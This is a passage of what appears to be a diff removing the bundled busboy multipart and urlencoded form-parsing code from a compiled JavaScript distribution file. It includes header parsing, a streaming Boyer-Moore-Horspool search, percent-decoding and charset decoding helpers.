= this.npairs = 0 - this.maxed = false - this.emit('header', header) -} - -HeaderParser.prototype._parseHeader = function () { - if (this.npairs === this.maxHeaderPairs) { return } - - const lines = this.buffer.split(RE_CRLF) - const len = lines.length - let m, h - - for (var i = 0; i < len; ++i) { // eslint-disable-line no-var - if (lines[i].length === 0) { continue } - if (lines[i][0] === '\t' || lines[i][0] === ' ') { - // folded header content - // RFC2822 says to just remove the CRLF and not the whitespace following - // it, so we follow the RFC and include the leading whitespace ... - if (h) { - this.header[h][this.header[h].length - 1] += lines[i] - continue - } - } - - const posColon = lines[i].indexOf(':') - if ( - posColon === -1 || - posColon === 0 - ) { - return - } - m = RE_HDR.exec(lines[i]) - h = m[1].toLowerCase() - this.header[h] = this.header[h] || [] - this.header[h].push((m[2] || '')) - if (++this.npairs === this.maxHeaderPairs) { break } - } -} - -module.exports = HeaderParser - - -/***/ }), - -/***/ 1620: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const inherits = (__nccwpck_require__(7261).inherits) -const ReadableStream = (__nccwpck_require__(4492).Readable) - -function PartStream (opts) { - ReadableStream.call(this, opts) -} -inherits(PartStream, ReadableStream) - -PartStream.prototype._read = function (n) {} - -module.exports = PartStream - - -/***/ }), - -/***/ 1142: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -/** - * Copyright Brian White. All rights reserved. - * - * @see https://github.com/mscdex/streamsearch - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to - * deal in the Software without restriction, including without limitation the - * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or - * sell copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING - * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS - * IN THE SOFTWARE. - * - * Based heavily on the Streaming Boyer-Moore-Horspool C++ implementation - * by Hongli Lai at: https://github.com/FooBarWidget/boyer-moore-horspool - */ -const EventEmitter = (__nccwpck_require__(5673).EventEmitter) -const inherits = (__nccwpck_require__(7261).inherits) - -function SBMH (needle) { - if (typeof needle === 'string') { - needle = Buffer.from(needle) - } - - if (!Buffer.isBuffer(needle)) { - throw new TypeError('The needle has to be a String or a Buffer.') - } - - const needleLength = needle.length - - if (needleLength === 0) { - throw new Error('The needle cannot be an empty String/Buffer.') - } - - if (needleLength > 256) { - throw new Error('The needle cannot have a length bigger than 256.') - } - - this.maxMatches = Infinity - this.matches = 0 - - this._occ = new Array(256) - .fill(needleLength) // Initialize occurrence table. - this._lookbehind_size = 0 - this._needle = needle - this._bufpos = 0 - - this._lookbehind = Buffer.alloc(needleLength) - - // Populate occurrence table with analysis of the needle, - // ignoring last letter. - for (var i = 0; i < needleLength - 1; ++i) { // eslint-disable-line no-var - this._occ[needle[i]] = needleLength - 1 - i - } -} -inherits(SBMH, EventEmitter) - -SBMH.prototype.reset = function () { - this._lookbehind_size = 0 - this.matches = 0 - this._bufpos = 0 -} - -SBMH.prototype.push = function (chunk, pos) { - if (!Buffer.isBuffer(chunk)) { - chunk = Buffer.from(chunk, 'binary') - } - const chlen = chunk.length - this._bufpos = pos || 0 - let r - while (r !== chlen && this.matches < this.maxMatches) { r = this._sbmh_feed(chunk) } - return r -} - -SBMH.prototype._sbmh_feed = function (data) { - const len = data.length - const needle = this._needle - const needleLength = needle.length - const lastNeedleChar = needle[needleLength - 1] - - // Positive: points to a position in `data` - // pos == 3 points to data[3] - // Negative: points to a position in the lookbehind buffer - // pos == -2 points to lookbehind[lookbehind_size - 2] - let pos = -this._lookbehind_size - let ch - - if (pos < 0) { - // Lookbehind buffer is not empty. Perform Boyer-Moore-Horspool - // search with character lookup code that considers both the - // lookbehind buffer and the current round's haystack data. - // - // Loop until - // there is a match. - // or until - // we've moved past the position that requires the - // lookbehind buffer. In this case we switch to the - // optimized loop. - // or until - // the character to look at lies outside the haystack. - while (pos < 0 && pos <= len - needleLength) { - ch = this._sbmh_lookup_char(data, pos + needleLength - 1) - - if ( - ch === lastNeedleChar && - this._sbmh_memcmp(data, pos, needleLength - 1) - ) { - this._lookbehind_size = 0 - ++this.matches - this.emit('info', true) - - return (this._bufpos = pos + needleLength) - } - pos += this._occ[ch] - } - - // No match. - - if (pos < 0) { - // There's too few data for Boyer-Moore-Horspool to run, - // so let's use a different algorithm to skip as much as - // we can. - // Forward pos until - // the trailing part of lookbehind + data - // looks like the beginning of the needle - // or until - // pos == 0 - while (pos < 0 && !this._sbmh_memcmp(data, pos, len - pos)) { ++pos } - } - - if (pos >= 0) { - // Discard lookbehind buffer. - this.emit('info', false, this._lookbehind, 0, this._lookbehind_size) - this._lookbehind_size = 0 - } else { - // Cut off part of the lookbehind buffer that has - // been processed and append the entire haystack - // into it. - const bytesToCutOff = this._lookbehind_size + pos - if (bytesToCutOff > 0) { - // The cut off data is guaranteed not to contain the needle. - this.emit('info', false, this._lookbehind, 0, bytesToCutOff) - } - - this._lookbehind.copy(this._lookbehind, 0, bytesToCutOff, - this._lookbehind_size - bytesToCutOff) - this._lookbehind_size -= bytesToCutOff - - data.copy(this._lookbehind, this._lookbehind_size) - this._lookbehind_size += len - - this._bufpos = len - return len - } - } - - pos += (pos >= 0) * this._bufpos - - // Lookbehind buffer is now empty. We only need to check if the - // needle is in the haystack. - if (data.indexOf(needle, pos) !== -1) { - pos = data.indexOf(needle, pos) - ++this.matches - if (pos > 0) { this.emit('info', true, data, this._bufpos, pos) } else { this.emit('info', true) } - - return (this._bufpos = pos + needleLength) - } else { - pos = len - needleLength - } - - // There was no match. If there's trailing haystack data that we cannot - // match yet using the Boyer-Moore-Horspool algorithm (because the trailing - // data is less than the needle size) then match using a modified - // algorithm that starts matching from the beginning instead of the end. - // Whatever trailing data is left after running this algorithm is added to - // the lookbehind buffer. - while ( - pos < len && - ( - data[pos] !== needle[0] || - ( - (Buffer.compare( - data.subarray(pos, pos + len - pos), - needle.subarray(0, len - pos) - ) !== 0) - ) - ) - ) { - ++pos - } - if (pos < len) { - data.copy(this._lookbehind, 0, pos, pos + (len - pos)) - this._lookbehind_size = len - pos - } - - // Everything until pos is guaranteed not to contain needle data. - if (pos > 0) { this.emit('info', false, data, this._bufpos, pos < len ? pos : len) } - - this._bufpos = len - return len -} - -SBMH.prototype._sbmh_lookup_char = function (data, pos) { - return (pos < 0) - ? this._lookbehind[this._lookbehind_size + pos] - : data[pos] -} - -SBMH.prototype._sbmh_memcmp = function (data, pos, len) { - for (var i = 0; i < len; ++i) { // eslint-disable-line no-var - if (this._sbmh_lookup_char(data, pos + i) !== this._needle[i]) { return false } - } - return true -} - -module.exports = SBMH - - -/***/ }), - -/***/ 727: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const WritableStream = (__nccwpck_require__(4492).Writable) -const { inherits } = __nccwpck_require__(7261) -const Dicer = __nccwpck_require__(2960) - -const MultipartParser = __nccwpck_require__(2183) -const UrlencodedParser = __nccwpck_require__(8306) -const parseParams = __nccwpck_require__(1854) - -function Busboy (opts) { - if (!(this instanceof Busboy)) { return new Busboy(opts) } - - if (typeof opts !== 'object') { - throw new TypeError('Busboy expected an options-Object.') - } - if (typeof opts.headers !== 'object') { - throw new TypeError('Busboy expected an options-Object with headers-attribute.') - } - if (typeof opts.headers['content-type'] !== 'string') { - throw new TypeError('Missing Content-Type-header.') - } - - const { - headers, - ...streamOptions - } = opts - - this.opts = { - autoDestroy: false, - ...streamOptions - } - WritableStream.call(this, this.opts) - - this._done = false - this._parser = this.getParserByHeaders(headers) - this._finished = false -} -inherits(Busboy, WritableStream) - -Busboy.prototype.emit = function (ev) { - if (ev === 'finish') { - if (!this._done) { - this._parser?.end() - return - } else if (this._finished) { - return - } - this._finished = true - } - WritableStream.prototype.emit.apply(this, arguments) -} - -Busboy.prototype.getParserByHeaders = function (headers) { - const parsed = parseParams(headers['content-type']) - - const cfg = { - defCharset: this.opts.defCharset, - fileHwm: this.opts.fileHwm, - headers, - highWaterMark: this.opts.highWaterMark, - isPartAFile: this.opts.isPartAFile, - limits: this.opts.limits, - parsedConType: parsed, - preservePath: this.opts.preservePath - } - - if (MultipartParser.detect.test(parsed[0])) { - return new MultipartParser(this, cfg) - } - if (UrlencodedParser.detect.test(parsed[0])) { - return new UrlencodedParser(this, cfg) - } - throw new Error('Unsupported Content-Type.') -} - -Busboy.prototype._write = function (chunk, encoding, cb) { - this._parser.write(chunk, cb) -} - -module.exports = Busboy -module.exports["default"] = Busboy -module.exports.Busboy = Busboy - -module.exports.Dicer = Dicer - - -/***/ }), - -/***/ 2183: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -// TODO: -// * support 1 nested multipart level -// (see second multipart example here: -// http://www.w3.org/TR/html401/interact/forms.html#didx-multipartform-data) -// * support limits.fieldNameSize -// -- this will require modifications to utils.parseParams - -const { Readable } = __nccwpck_require__(4492) -const { inherits } = __nccwpck_require__(7261) - -const Dicer = __nccwpck_require__(2960) - -const parseParams = __nccwpck_require__(1854) -const decodeText = __nccwpck_require__(4619) -const basename = __nccwpck_require__(8647) -const getLimit = __nccwpck_require__(1467) - -const RE_BOUNDARY = /^boundary$/i -const RE_FIELD = /^form-data$/i -const RE_CHARSET = /^charset$/i -const RE_FILENAME = /^filename$/i -const RE_NAME = /^name$/i - -Multipart.detect = /^multipart\/form-data/i -function Multipart (boy, cfg) { - let i - let len - const self = this - let boundary - const limits = cfg.limits - const isPartAFile = cfg.isPartAFile || ((fieldName, contentType, fileName) => (contentType === 'application/octet-stream' || fileName !== undefined)) - const parsedConType = cfg.parsedConType || [] - const defCharset = cfg.defCharset || 'utf8' - const preservePath = cfg.preservePath - const fileOpts = { highWaterMark: cfg.fileHwm } - - for (i = 0, len = parsedConType.length; i < len; ++i) { - if (Array.isArray(parsedConType[i]) && - RE_BOUNDARY.test(parsedConType[i][0])) { - boundary = parsedConType[i][1] - break - } - } - - function checkFinished () { - if (nends === 0 && finished && !boy._done) { - finished = false - self.end() - } - } - - if (typeof boundary !== 'string') { throw new Error('Multipart: Boundary not found') } - - const fieldSizeLimit = getLimit(limits, 'fieldSize', 1 * 1024 * 1024) - const fileSizeLimit = getLimit(limits, 'fileSize', Infinity) - const filesLimit = getLimit(limits, 'files', Infinity) - const fieldsLimit = getLimit(limits, 'fields', Infinity) - const partsLimit = getLimit(limits, 'parts', Infinity) - const headerPairsLimit = getLimit(limits, 'headerPairs', 2000) - const headerSizeLimit = getLimit(limits, 'headerSize', 80 * 1024) - - let nfiles = 0 - let nfields = 0 - let nends = 0 - let curFile - let curField - let finished = false - - this._needDrain = false - this._pause = false - this._cb = undefined - this._nparts = 0 - this._boy = boy - - const parserCfg = { - boundary, - maxHeaderPairs: headerPairsLimit, - maxHeaderSize: headerSizeLimit, - partHwm: fileOpts.highWaterMark, - highWaterMark: cfg.highWaterMark - } - - this.parser = new Dicer(parserCfg) - this.parser.on('drain', function () { - self._needDrain = false - if (self._cb && !self._pause) { - const cb = self._cb - self._cb = undefined - cb() - } - }).on('part', function onPart (part) { - if (++self._nparts > partsLimit) { - self.parser.removeListener('part', onPart) - self.parser.on('part', skipPart) - boy.hitPartsLimit = true - boy.emit('partsLimit') - return skipPart(part) - } - - // hack because streams2 _always_ doesn't emit 'end' until nextTick, so let - // us emit 'end' early since we know the part has ended if we are already - // seeing the next part - if (curField) { - const field = curField - field.emit('end') - field.removeAllListeners('end') - } - - part.on('header', function (header) { - let contype - let fieldname - let parsed - let charset - let encoding - let filename - let nsize = 0 - - if (header['content-type']) { - parsed = parseParams(header['content-type'][0]) - if (parsed[0]) { - contype = parsed[0].toLowerCase() - for (i = 0, len = parsed.length; i < len; ++i) { - if (RE_CHARSET.test(parsed[i][0])) { - charset = parsed[i][1].toLowerCase() - break - } - } - } - } - - if (contype === undefined) { contype = 'text/plain' } - if (charset === undefined) { charset = defCharset } - - if (header['content-disposition']) { - parsed = parseParams(header['content-disposition'][0]) - if (!RE_FIELD.test(parsed[0])) { return skipPart(part) } - for (i = 0, len = parsed.length; i < len; ++i) { - if (RE_NAME.test(parsed[i][0])) { - fieldname = parsed[i][1] - } else if (RE_FILENAME.test(parsed[i][0])) { - filename = parsed[i][1] - if (!preservePath) { filename = basename(filename) } - } - } - } else { return skipPart(part) } - - if (header['content-transfer-encoding']) { encoding = header['content-transfer-encoding'][0].toLowerCase() } else { encoding = '7bit' } - - let onData, - onEnd - - if (isPartAFile(fieldname, contype, filename)) { - // file/binary field - if (nfiles === filesLimit) { - if (!boy.hitFilesLimit) { - boy.hitFilesLimit = true - boy.emit('filesLimit') - } - return skipPart(part) - } - - ++nfiles - - if (!boy._events.file) { - self.parser._ignore() - return - } - - ++nends - const file = new FileStream(fileOpts) - curFile = file - file.on('end', function () { - --nends - self._pause = false - checkFinished() - if (self._cb && !self._needDrain) { - const cb = self._cb - self._cb = undefined - cb() - } - }) - file._read = function (n) { - if (!self._pause) { return } - self._pause = false - if (self._cb && !self._needDrain) { - const cb = self._cb - self._cb = undefined - cb() - } - } - boy.emit('file', fieldname, file, filename, encoding, contype) - - onData = function (data) { - if ((nsize += data.length) > fileSizeLimit) { - const extralen = fileSizeLimit - nsize + data.length - if (extralen > 0) { file.push(data.slice(0, extralen)) } - file.truncated = true - file.bytesRead = fileSizeLimit - part.removeAllListeners('data') - file.emit('limit') - return - } else if (!file.push(data)) { self._pause = true } - - file.bytesRead = nsize - } - - onEnd = function () { - curFile = undefined - file.push(null) - } - } else { - // non-file field - if (nfields === fieldsLimit) { - if (!boy.hitFieldsLimit) { - boy.hitFieldsLimit = true - boy.emit('fieldsLimit') - } - return skipPart(part) - } - - ++nfields - ++nends - let buffer = '' - let truncated = false - curField = part - - onData = function (data) { - if ((nsize += data.length) > fieldSizeLimit) { - const extralen = (fieldSizeLimit - (nsize - data.length)) - buffer += data.toString('binary', 0, extralen) - truncated = true - part.removeAllListeners('data') - } else { buffer += data.toString('binary') } - } - - onEnd = function () { - curField = undefined - if (buffer.length) { buffer = decodeText(buffer, 'binary', charset) } - boy.emit('field', fieldname, buffer, false, truncated, encoding, contype) - --nends - checkFinished() - } - } - - /* As of node@2efe4ab761666 (v0.10.29+/v0.11.14+), busboy had become - broken. Streams2/streams3 is a huge black box of confusion, but - somehow overriding the sync state seems to fix things again (and still - seems to work for previous node versions). - */ - part._readableState.sync = false - - part.on('data', onData) - part.on('end', onEnd) - }).on('error', function (err) { - if (curFile) { curFile.emit('error', err) } - }) - }).on('error', function (err) { - boy.emit('error', err) - }).on('finish', function () { - finished = true - checkFinished() - }) -} - -Multipart.prototype.write = function (chunk, cb) { - const r = this.parser.write(chunk) - if (r && !this._pause) { - cb() - } else { - this._needDrain = !r - this._cb = cb - } -} - -Multipart.prototype.end = function () { - const self = this - - if (self.parser.writable) { - self.parser.end() - } else if (!self._boy._done) { - process.nextTick(function () { - self._boy._done = true - self._boy.emit('finish') - }) - } -} - -function skipPart (part) { - part.resume() -} - -function FileStream (opts) { - Readable.call(this, opts) - - this.bytesRead = 0 - - this.truncated = false -} - -inherits(FileStream, Readable) - -FileStream.prototype._read = function (n) {} - -module.exports = Multipart - - -/***/ }), - -/***/ 8306: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Decoder = __nccwpck_require__(7100) -const decodeText = __nccwpck_require__(4619) -const getLimit = __nccwpck_require__(1467) - -const RE_CHARSET = /^charset$/i - -UrlEncoded.detect = /^application\/x-www-form-urlencoded/i -function UrlEncoded (boy, cfg) { - const limits = cfg.limits - const parsedConType = cfg.parsedConType - this.boy = boy - - this.fieldSizeLimit = getLimit(limits, 'fieldSize', 1 * 1024 * 1024) - this.fieldNameSizeLimit = getLimit(limits, 'fieldNameSize', 100) - this.fieldsLimit = getLimit(limits, 'fields', Infinity) - - let charset - for (var i = 0, len = parsedConType.length; i < len; ++i) { // eslint-disable-line no-var - if (Array.isArray(parsedConType[i]) && - RE_CHARSET.test(parsedConType[i][0])) { - charset = parsedConType[i][1].toLowerCase() - break - } - } - - if (charset === undefined) { charset = cfg.defCharset || 'utf8' } - - this.decoder = new Decoder() - this.charset = charset - this._fields = 0 - this._state = 'key' - this._checkingBytes = true - this._bytesKey = 0 - this._bytesVal = 0 - this._key = '' - this._val = '' - this._keyTrunc = false - this._valTrunc = false - this._hitLimit = false -} - -UrlEncoded.prototype.write = function (data, cb) { - if (this._fields === this.fieldsLimit) { - if (!this.boy.hitFieldsLimit) { - this.boy.hitFieldsLimit = true - this.boy.emit('fieldsLimit') - } - return cb() - } - - let idxeq; let idxamp; let i; let p = 0; const len = data.length - - while (p < len) { - if (this._state === 'key') { - idxeq = idxamp = undefined - for (i = p; i < len; ++i) { - if (!this._checkingBytes) { ++p } - if (data[i] === 0x3D/* = */) { - idxeq = i - break - } else if (data[i] === 0x26/* & */) { - idxamp = i - break - } - if (this._checkingBytes && this._bytesKey === this.fieldNameSizeLimit) { - this._hitLimit = true - break - } else if (this._checkingBytes) { ++this._bytesKey } - } - - if (idxeq !== undefined) { - // key with assignment - if (idxeq > p) { this._key += this.decoder.write(data.toString('binary', p, idxeq)) } - this._state = 'val' - - this._hitLimit = false - this._checkingBytes = true - this._val = '' - this._bytesVal = 0 - this._valTrunc = false - this.decoder.reset() - - p = idxeq + 1 - } else if (idxamp !== undefined) { - // key with no assignment - ++this._fields - let key; const keyTrunc = this._keyTrunc - if (idxamp > p) { key = (this._key += this.decoder.write(data.toString('binary', p, idxamp))) } else { key = this._key } - - this._hitLimit = false - this._checkingBytes = true - this._key = '' - this._bytesKey = 0 - this._keyTrunc = false - this.decoder.reset() - - if (key.length) { - this.boy.emit('field', decodeText(key, 'binary', this.charset), - '', - keyTrunc, - false) - } - - p = idxamp + 1 - if (this._fields === this.fieldsLimit) { return cb() } - } else if (this._hitLimit) { - // we may not have hit the actual limit if there are encoded bytes... - if (i > p) { this._key += this.decoder.write(data.toString('binary', p, i)) } - p = i - if ((this._bytesKey = this._key.length) === this.fieldNameSizeLimit) { - // yep, we actually did hit the limit - this._checkingBytes = false - this._keyTrunc = true - } - } else { - if (p < len) { this._key += this.decoder.write(data.toString('binary', p)) } - p = len - } - } else { - idxamp = undefined - for (i = p; i < len; ++i) { - if (!this._checkingBytes) { ++p } - if (data[i] === 0x26/* & */) { - idxamp = i - break - } - if (this._checkingBytes && this._bytesVal === this.fieldSizeLimit) { - this._hitLimit = true - break - } else if (this._checkingBytes) { ++this._bytesVal } - } - - if (idxamp !== undefined) { - ++this._fields - if (idxamp > p) { this._val += this.decoder.write(data.toString('binary', p, idxamp)) } - this.boy.emit('field', decodeText(this._key, 'binary', this.charset), - decodeText(this._val, 'binary', this.charset), - this._keyTrunc, - this._valTrunc) - this._state = 'key' - - this._hitLimit = false - this._checkingBytes = true - this._key = '' - this._bytesKey = 0 - this._keyTrunc = false - this.decoder.reset() - - p = idxamp + 1 - if (this._fields === this.fieldsLimit) { return cb() } - } else if (this._hitLimit) { - // we may not have hit the actual limit if there are encoded bytes... - if (i > p) { this._val += this.decoder.write(data.toString('binary', p, i)) } - p = i - if ((this._val === '' && this.fieldSizeLimit === 0) || - (this._bytesVal = this._val.length) === this.fieldSizeLimit) { - // yep, we actually did hit the limit - this._checkingBytes = false - this._valTrunc = true - } - } else { - if (p < len) { this._val += this.decoder.write(data.toString('binary', p)) } - p = len - } - } - } - cb() -} - -UrlEncoded.prototype.end = function () { - if (this.boy._done) { return } - - if (this._state === 'key' && this._key.length > 0) { - this.boy.emit('field', decodeText(this._key, 'binary', this.charset), - '', - this._keyTrunc, - false) - } else if (this._state === 'val') { - this.boy.emit('field', decodeText(this._key, 'binary', this.charset), - decodeText(this._val, 'binary', this.charset), - this._keyTrunc, - this._valTrunc) - } - this.boy._done = true - this.boy.emit('finish') -} - -module.exports = UrlEncoded - - -/***/ }), - -/***/ 7100: -/***/ ((module) => { - -"use strict"; - - -const RE_PLUS = /\+/g - -const HEX = [ - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, - 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 -] - -function Decoder () { - this.buffer = undefined -} -Decoder.prototype.write = function (str) { - // Replace '+' with ' ' before decoding - str = str.replace(RE_PLUS, ' ') - let res = '' - let i = 0; let p = 0; const len = str.length - for (; i < len; ++i) { - if (this.buffer !== undefined) { - if (!HEX[str.charCodeAt(i)]) { - res += '%' + this.buffer - this.buffer = undefined - --i // retry character - } else { - this.buffer += str[i] - ++p - if (this.buffer.length === 2) { - res += String.fromCharCode(parseInt(this.buffer, 16)) - this.buffer = undefined - } - } - } else if (str[i] === '%') { - if (i > p) { - res += str.substring(p, i) - p = i - } - this.buffer = '' - ++p - } - } - if (p < len && this.buffer === undefined) { res += str.substring(p) } - return res -} -Decoder.prototype.reset = function () { - this.buffer = undefined -} - -module.exports = Decoder - - -/***/ }), - -/***/ 8647: -/***/ ((module) => { - -"use strict"; - - -module.exports = function basename (path) { - if (typeof path !== 'string') { return '' } - for (var i = path.length - 1; i >= 0; --i) { // eslint-disable-line no-var - switch (path.charCodeAt(i)) { - case 0x2F: // '/' - case 0x5C: // '\' - path = path.slice(i + 1) - return (path === '..' || path === '.' ? '' : path) - } - } - return (path === '..' || path === '.' ? '' : path) -} - - -/***/ }), - -/***/ 4619: -/***/ (function(module) { - -"use strict"; - - -// Node has always utf-8 -const utf8Decoder = new TextDecoder('utf-8') -const textDecoders = new Map([ - ['utf-8', utf8Decoder], - ['utf8', utf8Decoder] -]) - -function getDecoder (charset) { - let lc - while (true) { - switch (charset) { - case 'utf-8': - case 'utf8': - return decoders.utf8 - case 'latin1': - case 'ascii': // TODO: Make these a separate, strict decoder? - case 'us-ascii': - case 'iso-8859-1': - case 'iso8859-1': - case 'iso88591': - case 'iso_8859-1': - case 'windows-1252': - case 'iso_8859-1:1987': - case 'cp1252': - case 'x-cp1252': - return decoders.latin1 - case 'utf16le': - case 'utf-16le': - case 'ucs2': - case 'ucs-2': - return decoders.utf16le - case 'base64': - return decoders.base64 - default: - if (lc === undefined) { - lc = true - charset = charset.toLowerCase() - continue - } - return decoders.other.bind(charset) - } - } -} - -const decoders = { - utf8: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - data = Buffer.from(data, sourceEncoding) - } - return data.utf8Slice(0, data.length) - }, - - latin1: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - return data - } - return data.latin1Slice(0, data.length) - }, - - utf16le: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - data = Buffer.from(data, sourceEncoding) - } - return data.ucs2Slice(0, data.length) - }, - - base64: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - data = Buffer.from(data, sourceEncoding) - } - return data.base64Slice(0, data.length) - }, - - other: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - data = Buffer.from(data, sourceEncoding) - } - - if (textDecoders.has(this.toString())) { - try { - return textDecoders.get(this).decode(data) - } catch (e) { } - } - return typeof data === 'string' - ? data - : data.toString() - } -} - -function decodeText (text, sourceEncoding, destEncoding) { - if (text) { - return getDecoder(destEncoding)(text, sourceEncoding) - } - return text -} - -module.exports = decodeText - - -/***/ }), - -/***/ 1467: -/***/ ((module) => { - -"use strict"; - - -module.exports = function getLimit (limits, name, defaultLimit) { - if ( - !limits || - limits[name] === undefined || - limits[name] === null - ) { return defaultLimit } - - if ( - typeof limits[name] !== 'number' || - isNaN(limits[name]) - ) { throw new TypeError('Limit ' + name + ' is not a valid number') } - - return limits[name] -} - - -/***/ }), - -/***/ 1854: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -/* eslint-disable object-property-newline */ - - -const decodeText = __nccwpck_require__(4619) - -const RE_ENCODED = /%[a-fA-F0-9][a-fA-F0-9]/g - -const EncodedLookup = { - '%00': '\x00', '%01': '\x01', '%02': '\x02', '%03': '\x03', '%04': '\x04', - '%05': '\x05', '%06': '\x06', '%07': '\x07', '%08': '\x08', '%09': '\x09', - '%0a': '\x0a', '%0A': '\x0a', '%0b': '\x0b', '%0B': '\x0b', '%0c': '\x0c', - '%0C': '\x0c', '%0d': '\x0d', '%0D': '\x0d', '%0e': '\x0e', '%0E': '\x0e', - '%0f': '\x0f', '%0F': '\x0f', '%10': '\x10', '%11': '\x11', '%12': '\x12', - '%13': '\x13', '%14': '\x14', '%15': '\x15', '%16': '\x16', '%17': '\x17', - '%18': '\x18', '%19': '\x19', '%1a': '\x1a', '%1A': '\x1a', '%1b': '\x1b', - '%1B': '\x1b', '%1c': '\x1c', '%1C': '\x1c', '%1d': '\x1d', '%1D': '\x1d', - '%1e': '\x1e', '%1E': '\x1e', '%1f': '\x1f', '%1F': '\x1f', '%20': '\x20', - '%21': '\x21', '%22': '\x22', '%23': '\x23', '%24': '\x24', '%25': '\x25', - '%26': '\x26', '%27': '\x27', '%28': '\x28', '%29': '\x29', '%2a': '\x2a', - '%2A': '\x2a', '%2b': '\x2b', '%2B': '\x2b', '%2c': '\x2c', '%2C': '\x2c', - '%2d': '\x2d', '%2D': '\x2d', '%2e': '\x2e', '%2E': '\x2e', '%2f': '\x2f', - '%2F': '\x2f', '%30': '\x30', '%31': '\x31', '%32': '\x32', '%33': '\x33', - '%34': '\x34', '%35': '\x35', '%36': '\x36', '%37': '\x37', '%38': '\x38', - '%39': '\x39', '%3a': '\x3a', '%3A': '\x3a', '%3b': '\x3b', '%3B': '\x3b', - '%3c': '\x3c', '%3C': '\x3c', '%3d': '\x3d', '%3D': '\x3d', '%3e': '\x3e', - '%3E': '\x3e', '%3f': '\x3f', '%3F': '\x3f', '%40': '\x40', '%41': '\x41', - '%42': '\x42', '%43': '\x43', '%44': '\x44', '%45': '\x45', '%46': '\x46', - '%47': '\x47', '%48': '\x48', '%49': '\x49', '%4a': '\x4a', '%4A': '\x4a', - '%4b': '\x4b', '%4B': '\x4b', '%4c': '\x4c', '%4C': '\x4c', '%4d': '\x4d', - '%4D': '\x4d', '%4e': '\x4e', '%4E': '\x4e', '%4f': '\x4f', '%4F': '\x4f', - '%50': '\x50', '%51': '\x51', '%52': '\x52', '%53': '\x53', '%54': '\x54', - '%55': '\x55', '%56': '\x56', '%57': '\x57', '%58': '\x58', '%59': '\x59', - '%5a': '\x5a', '%5A': '\x5a', '%5b': '\x5b', '%5B': '\x5b', '%5c': '\x5c', - '%5C': '\x5c', '%5d': '\x5d', '%5D': '\x5d', '%5e': '\x5e', '%5E': '\x5e', - '%5f': '\x5f', '%5F': '\x5f', '%60': '\x60', '%61': '\x61', '%62': '\x62', - '%63': '\x63', '%64': '\x64', '%65': '\x65', '%66': '\x66', '%67': '\x67', - '%68': '\x68', '%69': '\x69', '%6a': '\x6a', '%6A': '\x6a', '%6b': '\x6b', - '%6B': '\x6b', '%6c': '\x6c', '%6C': '\x6c', '%6d': '\x6d', '%6D': '\x6d', - '%6e': '\x6e', '%6E': '\x6e', '%6f': '\x6f', '%6F': '\x6f', '%70': '\x70', - '%71': '\x71', '%72': '\x72', '%73': '\x73', '%74': '\x74', '%75': '\x75', - '%76': '\x76', '%77': '\x77', '%78': '\x78', '%79': '\x79', '%7a': '\x7a', - '%7A': '\x7a', '%7b': '\x7b', '%7B': '\x7b', '%7c': '\x7c', '%7C': '\x7c', - '%7d': '\x7d', '%7D': '\x7d', '%7e': '\x7e', '%7E': '\x7e', '%7f': '\x7f', - '%7F': '\x7f', '%80': '\x80', '%81': '\x81', '%82': '\x82', '%83': '\x83', - '%84': '\x84', '%85': '\x85', '%86': '\x86', '%87': '\x87', '%88': '\x88', - '%89': '\x89', '%8a': '\x8a', '%8A': '\x8a', '%8b': '\x8b', '%8B': '\x8b', - '%8c': '\x8c', '%8C': '\x8c', '%8d': '\x8d', '%8D': '\x8d', '%8e': '\x8e', - '%8E': '\x8e', '%8f': '\x8f', '%8F': '\x8f', '%90': '\x90', '%91': '\x91', - '%92': '\x92', '%93': '\x93', '%94': '\x94', '%95': '\x95', '%96': '\x96', - '%97': '\x97', '%98': '\x98', '%99': '\x99', '%9a': '\x9a', '%9A': '\x9a', - '%9b': '\x9b', '%9B': '\x9b', '%9c': '\x9c', '%9C': '\x9c', '%9d': '\x9d', - '%9D': '\x9d', '%9e': '\x9e', '%9E': '\x9e', '%9f': '\x9f', '%9F': '\x9f', - '%a0': '\xa0', '%A0': '\xa0', '%a1': '\xa1', 